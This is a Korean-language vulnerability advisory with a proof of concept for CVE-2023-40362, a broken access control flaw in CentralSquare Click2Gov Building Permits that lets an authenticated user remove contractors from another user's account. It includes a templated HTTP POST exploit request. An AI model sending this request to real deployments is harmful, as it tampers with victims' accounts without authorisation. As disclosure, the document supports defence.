
CVE-2023-40362 취약점 세부 정보 및 개념 증명
CVE-2023-40362 취약점 세부 정보 및 개념 증명.
Click2Gov BP의 /Click2GovBP/mastercontractorlist.html URI에 있는 접근 제어 취약점으로 인해 인증된 사용자가 피해자의 사용자 ID와 삭제할 업체 정보를 사용하여 다른 사용자의 계정에서 업체를 삭제할 수 있습니다.
이는 웹 애플리케이션이 사용자가 지정된 사용자 ID의 계정에서 업체를 삭제할 권한이 있는지 확인하지 못하기 때문에 발생합니다.
공급업체: CentralSquare
보고자: Ally Petitt
발견일: June 13, 2023
영향받는 제품: Click2Gov Building Permits (BP)
영향받는 릴리스: Before October 2023
CVSS v3: 5.4 - Moderate (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)
아래와 같은 HTTP POST 요청을 통해 피해자의 계정에서 업체를 삭제할 수 있습니다. 이를 위해서는 유효한 CSRF 토큰이 필요합니다.
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>